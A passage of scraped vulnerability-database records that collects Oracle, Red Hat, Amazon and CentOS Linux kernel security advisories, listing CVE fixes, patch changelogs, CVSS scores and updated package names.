[Orabug: 26943864]\n[4.1.12-112.1.0]\n- x86/mm/64: Enable SWIOTLB if system has SRAT memory regions above MAX_DMA32_PFN (Igor Mammedov) [Orabug: 26754302] \n- x86/mm: Introduce max_possible_pfn (Igor Mammedov) [Orabug: 
26754302] \n- dtrace lockstat provider probes (Alan Maguire) [Orabug: 26149674] [Orabug: 26149956] \n- rds: RDS diagnostics when connections are stuck in Receiver Not Ready state. (hui.han) \n- timerfd: Protect the might cancel mechanism proper (Thomas Gleixner) [Orabug: 26673877] {CVE-2017-10661}\n- brcmfmac: fix possible buffer overflow in brcmf_cfg80211_mgmt_tx() (Tim Tianyang Chen) [Orabug: 26540118] {CVE-2017-7541}\n- crypto: ahash - Fix EINPROGRESS notification callback (Herbert Xu) [Orabug: 25882988] {CVE-2017-7618}\n- xen/mmu: Call xen_cleanhighmap() with 4MB aligned for page tables mapping (Zhenzhong Duan) [Orabug: 26883325] \n- selftests/memfd: add memfd_create hugetlbfs selftest (Mike Kravetz) [Orabug: 26768367] \n- mm/shmem: add hugetlbfs support to memfd_create() (Mike Kravetz) [Orabug: 26768367] \n- mm: shm: use new hugetlb size encoding definitions (Mike Kravetz) [Orabug: 26768367] \n- mm: arch: consolidate mmap hugetlb size encodings (Mike Kravetz) [Orabug: 26768367] \n- uapi/Kbuild: add new header file hugetlb_encode.h (Mike Kravetz) [Orabug: 26768367] \n- mm: hugetlb: define system call hugetlb size encodings in single file (Mike Kravetz) [Orabug: 26768367] \n- RDS: IB: Change the proxy qps path_mtu to IB_MTU_256 (Avinash Repaka) [Orabug: 26864694] \n- devpts: clean up interface to pty drivers (Linus Torvalds) [Orabug: 26743034] \n- tcp: fix tcp_mark_head_lost to check skb len before fragmenting (Neal Cardwell) [Orabug: 26646104] \n- kvm: nVMX: Dont allow L2 to access the hardware CR8 (Jim Mattson) {CVE-2017-12154} {CVE-2017-12154}\n- dtrace: ensure SDT stub function returns 0 (Kris Van Hees) [Orabug: 26909775] \n- tcp: initialize rcv_mss to TCP_MIN_MSS instead of 0 (Wei Wang) [Orabug: 26796038] {CVE-2017-14106}\n- xfrm: fix stack access out of bounds with CONFIG_XFRM_SUB_POLICY (Sabrina Dubroca) [Orabug: 25959303] \n- rxrpc: Fix several cases where a padded len isnt checked in ticket decode (David Howells) [Orabug: 26376434] {CVE-2017-7482} 
{CVE-2017-7482}\n- xen: dont print error message in case of missing Xenstore entry (Juergen Gross) [Orabug: 26841566] \n- mlx4_core: calculate log_num_mtt based on total system memory (Wei Lin Guay) [Orabug: 26526968] \n- xen/x86: Add interface for querying amount of host memory (Boris Ostrovsky) [Orabug: 26526923] \n- rds: Fix non-atomic operation on shared flag variable (Hakon Bugge) [Orabug: 26842076] \n- rds: Fix incorrect statistics counting (Hakon Bugge) [Orabug: 26847583] \n- i40e: use cpumask_copy instead of direct assignment (Jacob Keller) [Orabug: 26822609] \n- mm: thp: set THP defrag by default to madvise and add a stall-free defrag option (Mel Gorman) [Orabug: 26587019] \n- crypto: testmgr - Set struct aead_testvec iv member size to MAX_IVLEN (Somasundaram Krishnasamy) [Orabug: 25925256] \n- SPEC: remove ctf.ko from ueknano modules list (Nick Alcock) [Orabug: 25815362] \n- SPEC: generate CTF when DTrace is enabled. (Nick Alcock) [Orabug: 25815362] \n- SPEC: bump libdtrace-ctf requirement to 0.7+. 
(Nick Alcock) [Orabug: 25815362] \n- Documentation: add watermark_scale_factor to the list of vm systcl file (Jerome Marchand) [Orabug: 26643957] \n- mm: scale kswapd watermarks in proportion to memory (Johannes Weiner) [Orabug: 26643957] \n- ctf: delete the deduplication blacklist (Nick Alcock) [Orabug: 26765112] \n- ctf: automate away the deduplication blacklist (Nick Alcock) [Orabug: 26765112] \n- ctf: drop CONFIG_DT_DISABLE_CTF, ctf.ko, and all that it implies (Nick Alcock) [Orabug: 25815362] \n- ctf: do not allow dwarf2ctf to run as root (Nick Alcock) [Orabug: 25815362] \n- ctf: decouple CTF building from the kernel build (Nick Alcock) [Orabug: 25815362] \n- ctf: handle the bit_offset in members with a DW_FORM_block data_member_location (Nick Alcock) [Orabug: 26387109] \n- ctf: handle DW_AT_specification (Nick Alcock) [Orabug: 26386100]", "edition": 72, "modified": "2017-12-13T00:00:00", "published": "2017-12-13T00:00:00", "id": "ELSA-2017-3659", "href": "http://linux.oracle.com/errata/ELSA-2017-3659.html", "title": "Unbreakable Enterprise kernel security and bugfix update", "type": "oraclelinux", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:35:51", "bulletinFamily": "unix", "cvelist": ["CVE-2017-1000380", "CVE-2017-14489", "CVE-2017-8831", "CVE-2017-2671", "CVE-2017-11473", "CVE-2017-9075", "CVE-2017-10661", "CVE-2017-1000363", "CVE-2017-9077", "CVE-2016-10044"], "description": "kernel-uek\n[3.8.13-118.19.12]\n- nvme: Drop nvmeq->q_lock before dma_pool_alloc(), so as to prevent hard lockups (Aruna Ramakrishna) [Orabug: 25409587]\n[3.8.13-118.19.11]\n- nvme: Handle PM1725 HIL reset (Martin K. 
Petersen) [Orabug: 26277600] \n- char: lp: fix possible integer overflow in lp_setup() (Willy Tarreau) [Orabug: 26403940] {CVE-2017-1000363}\n- ALSA: timer: Fix missing queue indices reset at SNDRV_TIMER_IOCTL_SELECT (Takashi Iwai) [Orabug: 26403956] {CVE-2017-1000380}\n- ALSA: timer: Fix race between read and ioctl (Takashi Iwai) [Orabug: 26403956] {CVE-2017-1000380}\n- ALSA: timer: fix NULL pointer dereference in read()/ioctl() race (Vegard Nossum) [Orabug: 26403956] {CVE-2017-1000380}\n- ALSA: timer: Fix negative queue usage by racy accesses (Takashi Iwai) [Orabug: 26403956] {CVE-2017-1000380}\n- ALSA: timer: Fix race at concurrent reads (Takashi Iwai) [Orabug: 26403956] {CVE-2017-1000380}\n- ALSA: timer: Fix race among timer ioctls (Takashi Iwai) [Orabug: 26403956] {CVE-2017-1000380}\n- ipv6/dccp: do not inherit ipv6_mc_list from parent (WANG Cong) [Orabug: 26404005] {CVE-2017-9077}\n- ocfs2: fix deadlock issue when taking inode lock at vfs entry points (Eric Ren) [Orabug: 26427126] \n- ocfs2/dlmglue: prepare tracking logic to avoid recursive cluster lock (Eric Ren) [Orabug: 26427126] \n- ping: implement proper locking (Eric Dumazet) [Orabug: 26540286] {CVE-2017-2671}\n- aio: mark AIO pseudo-fs noexec (Jann Horn) [Orabug: 26643598] {CVE-2016-10044}\n- vfs: Commit to never having exectuables on proc and sysfs. (Eric W. 
Biederman) [Orabug: 26643598] {CVE-2016-10044}\n- vfs, writeback: replace FS_CGROUP_WRITEBACK with SB_I_CGROUPWB (Tejun Heo) [Orabug: 26643598] {CVE-2016-10044}\n- x86/acpi: Prevent out of bound access caused by broken ACPI tables (Seunghun Han) [Orabug: 26643645] {CVE-2017-11473}\n- sctp: do not inherit ipv6_{mc|ac|fl}_list from parent (Eric Dumazet) [Orabug: 26650883] {CVE-2017-9075}\n- [media] saa7164: fix double fetch PCIe access condition (Steven Toth) [Orabug: 26675142] {CVE-2017-8831}\n- [media] saa7164: fix sparse warnings (Hans Verkuil) [Orabug: 26675142] {CVE-2017-8831}\n- fs: __generic_file_splice_read retry lookup on AOP_TRUNCATED_PAGE (Abhi Das) [Orabug: 26797306] \n- timerfd: Protect the might cancel mechanism proper (Thomas Gleixner) [Orabug: 26899787] {CVE-2017-10661}\n- scsi: scsi_transport_iscsi: fix the issue that iscsi_if_rx doesn't parse nlmsg properly (Xin Long) [Orabug: 26988627] {CVE-2017-14489}", "edition": 4, "modified": "2017-11-02T00:00:00", "published": "2017-11-02T00:00:00", "id": "ELSA-2017-3636", "href": "http://linux.oracle.com/errata/ELSA-2017-3636.html", "title": "Unbreakable Enterprise kernel security update", "type": "oraclelinux", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:39:28", "bulletinFamily": "unix", "cvelist": ["CVE-2017-1000380", "CVE-2017-14489", "CVE-2017-9074", "CVE-2017-8831", "CVE-2017-11473", "CVE-2017-9075", "CVE-2017-10661", "CVE-2017-7308", "CVE-2017-1000363", "CVE-2017-9077", "CVE-2016-10044"], "description": "[2.6.39-400.297.12]\n- xsigo: [backport] Fix race in freeing aged Forwarding tables (Pradeep Gopanapalli) [Orabug: 24823234] \n- ocfs2: fix deadlock issue when taking inode lock at vfs entry points (Eric Ren) [Orabug: 25671723] \n- ocfs2/dlmglue: prepare tracking logic to avoid recursive cluster lock (Eric Ren) [Orabug: 25671723] \n- net/packet: fix overflow in check for tp_reserve (Andrey Konovalov) [Orabug: 26143563] {CVE-2017-7308}\n- net/packet: fix 
overflow in check for tp_frame_nr (Andrey Konovalov) [Orabug: 26143563] {CVE-2017-7308}\n- char: lp: fix possible integer overflow in lp_setup() (Willy Tarreau) [Orabug: 26403941] {CVE-2017-1000363}\n- ALSA: timer: Fix missing queue indices reset at SNDRV_TIMER_IOCTL_SELECT (Takashi Iwai) [Orabug: 26403958] {CVE-2017-1000380}\n- ALSA: timer: Fix race between read and ioctl (Takashi Iwai) [Orabug: 26403958] {CVE-2017-1000380}\n- ALSA: timer: fix NULL pointer dereference in read()/ioctl() race (Vegard Nossum) [Orabug: 26403958] {CVE-2017-1000380}\n- ALSA: timer: Fix negative queue usage by racy accesses (Takashi Iwai) [Orabug: 26403958] {CVE-2017-1000380}\n- ALSA: timer: Fix race at concurrent reads (Takashi Iwai) [Orabug: 26403958] {CVE-2017-1000380}\n- ALSA: timer: Fix race among timer ioctls (Takashi Iwai) [Orabug: 26403958] {CVE-2017-1000380}\n- ipv6: xfrm: Handle errors reported by xfrm6_find_1stfragopt() (Ben Hutchings) [Orabug: 26403974] {CVE-2017-9074}\n- ipv6: Check ip6_find_1stfragopt() return value properly. (David S. Miller) [Orabug: 26403974] {CVE-2017-9074}\n- ipv6: Prevent overrun when parsing v6 header options (Craig Gallek) [Orabug: 26403974] {CVE-2017-9074}\n- ipv6/dccp: do not inherit ipv6_mc_list from parent (WANG Cong) [Orabug: 26404007] {CVE-2017-9077}\n- aio: mark AIO pseudo-fs noexec (Jann Horn) [Orabug: 26643601] {CVE-2016-10044}\n- vfs: Commit to never having exectuables on proc and sysfs. (Eric W. 
Biederman) [Orabug: 26643601] {CVE-2016-10044}\n- vfs, writeback: replace FS_CGROUP_WRITEBACK with SB_I_CGROUPWB (Tejun Heo) [Orabug: 26643601] {CVE-2016-10044}\n- x86/acpi: Prevent out of bound access caused by broken ACPI tables (Seunghun Han) [Orabug: 26643652] {CVE-2017-11473}\n- sctp: do not inherit ipv6_{mc|ac|fl}_list from parent (Eric Dumazet) [Orabug: 26650889] {CVE-2017-9075}\n- saa7164: fix double fetch PCIe access condition (Steven Toth) [Orabug: 26675148] {CVE-2017-8831}\n- saa7164: fix sparse warnings (Hans Verkuil) [Orabug: 26675148] {CVE-2017-8831}\n- saa7164: get rid of warning: no previous prototype (Mauro Carvalho Chehab) [Orabug: 26675148] {CVE-2017-8831}\n- [scsi] lpfc 8.3.44: Fix kernel panics from corrupted ndlp (James Smart) [Orabug: 26765341] \n- timerfd: Protect the might cancel mechanism proper (Thomas Gleixner) [Orabug: 26899791] {CVE-2017-10661}\n- scsi: scsi_transport_iscsi: fix the issue that iscsi_if_rx doesn't parse nlmsg properly (Xin Long) [Orabug: 26988628] {CVE-2017-14489}", "edition": 4, "modified": "2017-11-02T00:00:00", "published": "2017-11-02T00:00:00", "id": "ELSA-2017-3637", "href": "http://linux.oracle.com/errata/ELSA-2017-3637.html", "title": "Unbreakable Enterprise kernel security update", "type": "oraclelinux", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}], "redhat": [{"lastseen": "2019-08-13T18:46:54", "bulletinFamily": "unix", "cvelist": ["CVE-2017-12154", "CVE-2017-15129", "CVE-2017-15274", "CVE-2018-14633", "CVE-2018-3693"], "description": "The kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* An industry-wide issue was found in the way many modern microprocessor designs have implemented speculative execution of instructions past bounds check. The flaw relies on the presence of a precisely-defined instruction sequence in the privileged code and the fact that memory writes occur to an address which depends on the untrusted value. 
Such writes cause an update into the microprocessor's data cache even for speculatively executed instructions that never actually commit (retire). As a result, an unprivileged attacker could use this flaw to influence speculative execution and/or read privileged memory by conducting targeted cache side-channel attacks. (CVE-2018-3693)\n\n* Kernel: kvm: nVMX: L2 guest could access hardware(L0) CR8 register (CVE-2017-12154)\n\n* kernel: net: double-free and memory corruption in get_net_ns_by_id() (CVE-2017-15129)\n\n* kernel: dereferencing NULL payload with nonzero length (CVE-2017-15274)\n\n* kernel: stack-based buffer overflow in chap_server_compute_md5() in iscsi target (CVE-2018-14633)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.\n\nBug Fix(es):\n\n* ovl_create can return positive retval and crash the host (BZ#1696290)\n\n* THP: Race between MADV_DONTNEED and NUMA hinting node migration code (BZ#1698105)\n\n* RHEL7.6 - Kernel changes for count cache flush Spectre v2 mitigation (BZ#1708543)\n\n* Poor system performance from thundering herd of kworkers competing for mddev->flush_bio ownership (BZ#1712762)\n\n* [RHEL7.7] RAID1 `write-behind` causes a kernel panic (BZ#1712999)\n\nEnhancement(s):\n\n* [Intel 7.5 FEAT] i40evf - Update to latest upstream driver version (BZ#1722774)\n\n* [netdrv] i40e/i40evf: Fix use after free in Rx cleanup path [7.4.z] (BZ#1723831)\n\nUsers of kernel are advised to upgrade to these updated packages, which fix these bugs and add these enhancements.", "modified": "2019-07-30T12:51:31", "published": "2019-07-30T12:23:10", "id": "RHSA-2019:1946", "href": "https://access.redhat.com/errata/RHSA-2019:1946", "type": "redhat", "title": "(RHSA-2019:1946) Important: kernel security, bug fix, and enhancement update", "cvss": {"score": 8.3, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:C"}}, {"lastseen": 
"2019-08-13T18:46:39", "bulletinFamily": "unix", "cvelist": ["CVE-2017-1000252", "CVE-2017-1000410", "CVE-2017-13166", "CVE-2017-15265", "CVE-2017-17449", "CVE-2017-18017", "CVE-2017-8824", "CVE-2017-9725"], "description": "The kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* kernel: Use-after-free vulnerability in DCCP socket (CVE-2017-8824, Important)\n\n* kernel: v4l2: disabled memory access protection mechanism allowing privilege escalation (CVE-2017-13166, Important)\n\n* kernel: Incorrect type conversion for size during dma allocation (CVE-2017-9725, Moderate)\n\n* kernel: Use-after-free in snd_seq_ioctl_create_port() (CVE-2017-15265, Moderate)\n\n* kernel: Missing namespace check in net/netlink/af_netlink.c allows for network monitors to observe systemwide activity (CVE-2017-17449, Moderate)\n\n* kernel: netfilter: use-after-free in tcpmss_mangle_packet function in net/netfilter/xt_TCPMSS.c (CVE-2017-18017, Moderate)\n\n* kernel: kvm: Reachable BUG() on out-of-bounds guest IRQ (CVE-2017-1000252, Moderate)\n\n* kernel: Stack information leak in the EFS element (CVE-2017-1000410, Moderate)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.\n\nRed Hat would like to thank Mohamed Ghannam for reporting CVE-2017-8824; Jan H. Sch\u00f6nherr (Amazon) for reporting CVE-2017-1000252; and Armis Labs for reporting CVE-2017-1000410.\n\nBug Fix(es):\n\nThese updated kernel packages include also numerous bug fixes. Space precludes documenting all of these bug fixes in this advisory. 
See the bug fix descriptions in the related Knowledge Article:\nhttps://access.redhat.com/articles/3411331", "modified": "2018-04-17T19:12:16", "published": "2018-04-17T18:31:22", "id": "RHSA-2018:1130", "href": "https://access.redhat.com/errata/RHSA-2018:1130", "type": "redhat", "title": "(RHSA-2018:1130) Important: kernel security and bug fix update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "amazon": [{"lastseen": "2020-11-10T12:37:36", "bulletinFamily": "unix", "cvelist": ["CVE-2017-15274", "CVE-2017-14991", "CVE-2017-1000251", "CVE-2017-12192", "CVE-2017-14340", "CVE-2017-12154"], "description": "**Issue Overview:**\n\nstack buffer overflow in the native Bluetooth stack \nA stack buffer overflow flaw was found in the way the Bluetooth subsystem of the Linux kernel processed pending L2CAP configuration responses from a client. On systems with the stack protection feature enabled in the kernel (CONFIG_CC_STACKPROTECTOR=y, which is enabled on all architectures other than s390x and ppc64[le]), an unauthenticated attacker able to initiate a connection to a system via Bluetooth could use this flaw to crash the system. Due to the nature of the stack protection feature, code execution cannot be fully ruled out, although we believe it is unlikely. On systems without the stack protection feature (ppc64[le]; the Bluetooth modules are not built on s390x), an unauthenticated attacker able to initiate a connection to a system via Bluetooth could use this flaw to remotely execute arbitrary code on the system with ring 0 (kernel) privileges. ([CVE-2017-1000251 __](<https://access.redhat.com/security/cve/CVE-2017-1000251>))\n\ndereferencing NULL payload with nonzero length \nA flaw was found in the implementation of associative arrays where the add_key systemcall and KEYCTL_UPDATE operations allowed for a NULL payload with a nonzero length. 
When accessing the payload within this length parameter's value, an unprivileged user could trivially cause a NULL pointer dereference (kernel oops). ([CVE-2017-15274 __](<https://access.redhat.com/security/cve/CVE-2017-15274>))\n\nxfs: unprivileged user kernel oops \nA flaw was found where the XFS filesystem code mishandles a user-settable inode flag in the Linux kernel prior to 4.14-rc1. This can cause a local denial of service via a kernel panic. ([CVE-2017-14340 __](<https://access.redhat.com/security/cve/CVE-2017-14340>))\n\nInformation leak in the scsi driver \nThe sg_ioctl() function in 'drivers/scsi/sg.c' in the Linux kernel, from version 4.12-rc1 to 4.14-rc2, allows local users to obtain sensitive information from uninitialized kernel heap-memory locations via an SG_GET_REQUEST_TABLE ioctl call for '/dev/sg0'. ([CVE-2017-14991 __](<https://access.redhat.com/security/cve/CVE-2017-14991>))\n\nkvm: nVMX: L2 guest could access hardware(L0) CR8 register \nLinux kernel built with the KVM virtualization support (CONFIG_KVM), with nested virtualization (nVMX) feature enabled (nested=1), is vulnerable to a crash due to disabled external interrupts. As L2 guest could access (r/w) hardware CR8 register of the host(L0). In a nested virtualization setup, L2 guest user could use this flaw to potentially crash the host(L0) resulting in DoS. ([CVE-2017-12154 __](<https://access.redhat.com/security/cve/CVE-2017-12154>))\n\n \n**Affected Packages:** \n\n\nkernel\n\n \n**Issue Correction:** \nRun _yum update kernel_ to update your system. 
\n\n\n \n\n\n**New Packages:**\n \n \n i686: \n kernel-headers-4.9.58-18.51.amzn1.i686 \n perf-4.9.58-18.51.amzn1.i686 \n perf-debuginfo-4.9.58-18.51.amzn1.i686 \n kernel-4.9.58-18.51.amzn1.i686 \n kernel-devel-4.9.58-18.51.amzn1.i686 \n kernel-tools-debuginfo-4.9.58-18.51.amzn1.i686 \n kernel-debuginfo-4.9.58-18.51.amzn1.i686 \n kernel-tools-4.9.58-18.51.amzn1.i686 \n kernel-tools-devel-4.9.58-18.51.amzn1.i686 \n kernel-debuginfo-common-i686-4.9.58-18.51.amzn1.i686 \n \n noarch: \n kernel-doc-4.9.58-18.51.amzn1.noarch \n \n src: \n kernel-4.9.58-18.51.amzn1.src \n \n x86_64: \n kernel-tools-debuginfo-4.9.58-18.51.amzn1.x86_64 \n kernel-debuginfo-common-x86_64-4.9.58-18.51.amzn1.x86_64 \n kernel-devel-4.9.58-18.51.amzn1.x86_64 \n kernel-debuginfo-4.9.58-18.51.amzn1.x86_64 \n kernel-4.9.58-18.51.amzn1.x86_64 \n perf-debuginfo-4.9.58-18.51.amzn1.x86_64 \n kernel-tools-devel-4.9.58-18.51.amzn1.x86_64 \n kernel-tools-4.9.58-18.51.amzn1.x86_64 \n perf-4.9.58-18.51.amzn1.x86_64 \n kernel-headers-4.9.58-18.51.amzn1.x86_64 \n \n \n", "edition": 6, "modified": "2017-10-26T16:43:00", "published": "2017-10-26T16:43:00", "id": "ALAS-2017-914", "href": "https://alas.aws.amazon.com/ALAS-2017-914.html", "title": "Important: kernel", "type": "amazon", "cvss": {"score": 7.7, "vector": "AV:A/AC:L/Au:S/C:C/I:C/A:C"}}], "centos": [{"lastseen": "2019-12-20T18:27:00", "bulletinFamily": "unix", "cvelist": ["CVE-2017-5754", "CVE-2017-17558", "CVE-2016-8633", "CVE-2018-1000004", "CVE-2017-15274", "CVE-2017-15265", "CVE-2017-18203", "CVE-2017-1000252", "CVE-2018-6927", "CVE-2017-15129", "CVE-2017-7294", "CVE-2017-14140", "CVE-2017-8824", "CVE-2017-17448", "CVE-2017-13166", "CVE-2017-13305", "CVE-2017-1000407", "CVE-2017-15126", "CVE-2017-15116", "CVE-2017-18270", "CVE-2017-1000410", "CVE-2017-17449", "CVE-2017-9725", "CVE-2016-7913", "CVE-2017-15127", "CVE-2018-5750", "CVE-2017-15121", "CVE-2017-18017", "CVE-2017-12154", "CVE-2016-3672", "CVE-2017-12190"], "description": "**CentOS Errata 
and Security Advisory** CESA-2018:1062\n\n\nThe kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* hw: cpu: speculative execution permission faults handling (CVE-2017-5754, Important, KVM for Power)\n\n* kernel: Buffer overflow in firewire driver via crafted incoming packets (CVE-2016-8633, Important)\n\n* kernel: Use-after-free vulnerability in DCCP socket (CVE-2017-8824, Important)\n\n* Kernel: kvm: nVMX: L2 guest could access hardware(L0) CR8 register (CVE-2017-12154, Important)\n\n* kernel: v4l2: disabled memory access protection mechanism allowing privilege escalation (CVE-2017-13166, Important)\n\n* kernel: media: use-after-free in [tuner-xc2028] media driver (CVE-2016-7913, Moderate)\n\n* kernel: drm/vmwgfx: fix integer overflow in vmw_surface_define_ioctl() (CVE-2017-7294, Moderate)\n\n* kernel: Incorrect type conversion for size during dma allocation (CVE-2017-9725, Moderate)\n\n* kernel: memory leak when merging buffers in SCSI IO vectors (CVE-2017-12190, Moderate)\n\n* kernel: vfs: BUG in truncate_inode_pages_range() and fuse client (CVE-2017-15121, Moderate)\n\n* kernel: Use-after-free in userfaultfd_event_wait_completion function in userfaultfd.c (CVE-2017-15126, Moderate)\n\n* kernel: net: double-free and memory corruption in get_net_ns_by_id() (CVE-2017-15129, Moderate)\n\n* kernel: Use-after-free in snd_seq_ioctl_create_port() (CVE-2017-15265, Moderate)\n\n* kernel: Missing capabilities check in net/netfilter/nfnetlink_cthelper.c allows for unprivileged access to systemwide nfnl_cthelper_list structure (CVE-2017-17448, Moderate)\n\n* kernel: Missing namespace check in net/netlink/af_netlink.c allows for network monitors to observe systemwide activity (CVE-2017-17449, Moderate)\n\n* kernel: Unallocated memory access by malicious USB device via bNumInterfaces overflow (CVE-2017-17558, Moderate)\n\n* kernel: netfilter: use-after-free in tcpmss_mangle_packet function in net/netfilter/xt_TCPMSS.c 
(CVE-2017-18017, Moderate)\n\n* kernel: Race condition in drivers/md/dm.c:dm_get_from_kobject() allows local users to cause a denial of service (CVE-2017-18203, Moderate)\n\n* kernel: kvm: Reachable BUG() on out-of-bounds guest IRQ (CVE-2017-1000252, Moderate)\n\n* Kernel: KVM: DoS via write flood to I/O port 0x80 (CVE-2017-1000407, Moderate)\n\n* kernel: Stack information leak in the EFS element (CVE-2017-1000410, Moderate)\n\n* kernel: Kernel address information leak in drivers/acpi/sbshc.c:acpi_smbus_hc_add() function potentially allowing KASLR bypass (CVE-2018-5750, Moderate)\n\n* kernel: Race condition in sound system can lead to denial of service (CVE-2018-1000004, Moderate)\n\n * kernel: multiple Low security impact security issues (CVE-2016-3672, CVE-2017-14140, CVE-2017-15116, CVE-2017-15127, CVE-2018-6927, Low)\n\nRed Hat would like to thank Eyal Itkin for reporting CVE-2016-8633; Google Project Zero for reporting CVE-2017-5754; Mohamed Ghannam for reporting CVE-2017-8824; Jim Mattson (Google.com) for reporting CVE-2017-12154; Vitaly Mayatskih for reporting CVE-2017-12190; Andrea Arcangeli (Engineering) for reporting CVE-2017-15126; Kirill Tkhai for reporting CVE-2017-15129; Jan H. Sch\u00f6nherr (Amazon) for reporting CVE-2017-1000252; and Armis Labs for reporting CVE-2017-1000410. 
The CVE-2017-15121 issue was discovered by Miklos Szeredi (Red Hat) and the CVE-2017-15116 issue was discovered by ChunYu Wang (Red Hat).\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.\n\nAdditional Changes:\n\nFor detailed information on changes in this release, see the Red Hat Enterprise Linux 7.5 Release Notes linked from the References section.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-cr-announce/2018-April/005226.html\n\n**Affected packages:**\nkernel-abi-whitelists\nkernel-doc\n\n**Upstream details at:**\n", "edition": 4, "modified": "2018-04-27T05:53:39", "published": "2018-04-27T05:53:39", "id": "CESA-2018:1062", "href": "http://lists.centos.org/pipermail/centos-cr-announce/2018-April/005226.html", "title": "kernel security update", "type": "centos", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}